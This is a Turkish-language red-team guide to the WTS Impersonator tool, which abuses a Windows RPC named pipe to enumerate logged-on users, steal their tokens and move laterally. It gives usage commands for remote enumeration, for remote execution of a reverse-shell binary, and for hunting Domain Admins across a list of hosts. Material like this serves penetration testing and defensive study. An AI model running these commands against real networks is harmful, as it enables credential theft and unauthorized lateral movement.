WTS Impersonator aracı, geleneksel Token Taklit tekniklerini atlayarak oturum açmış kullanıcıları gizlice sıralamak ve token'larını ele geçirmek için "\pipe\LSM_API_service" RPC Adlandırılmış boruyu kullanır. Bu yaklaşım, ağlar içinde sorunsuz yatay hareketleri kolaylaştırır. Bu tekniğin arkasındaki yenilik, Omri Baso'ya aittir ve çalışması GitHub üzerinden erişilebilir.

Temel İşlevsellik

Araç, bir dizi API çağrısı aracılığıyla çalışır:

WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW

Ana Modüller ve Kullanım

• Kullanıcıları Sıralama: Araçla yerel ve uzak kullanıcı sıralaması mümkündür, her iki senaryo için de komutlar kullanılır:

• Yerel olarak:

.\WTSImpersonator.exe -m enum

• Uzaktan, IP adresi veya ana bilgisayar adı belirterek:

.\WTSImpersonator.exe -m enum -s 192.168.40.131

• Komutların Yürütülmesi: exec ve exec-remote modülleri işlev görmek için bir Hizmet bağlamına ihtiyaç duyar. Yerel yürütme sadece WTSImpersonator yürütülebilir dosyası ve bir komut gerektirir:

• Yerel komut yürütme örneği:

.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe

• Bir hizmet bağlamı elde etmek için PsExec64.exe kullanılabilir:

.\PsExec64.exe -accepteula -s cmd.exe

• Uzaktan Komut Yürütme: PsExec.exe'ye benzer şekilde uzaktan bir hizmet oluşturup yükleyerek uygun izinlerle yürütme içerir.

• Uzaktan yürütme örneği:

.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2

• Kullanıcı Avı Modülü: Birden fazla makinede belirli kullanıcıları hedef alarak, kimlik bilgileri altında kod yürütme. Bu, özellikle birkaç sistemde yerel yönetici haklarına sahip Alan Yöneticilerini hedeflemek için kullanışlıdır.

• Kullanım örneği:

.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe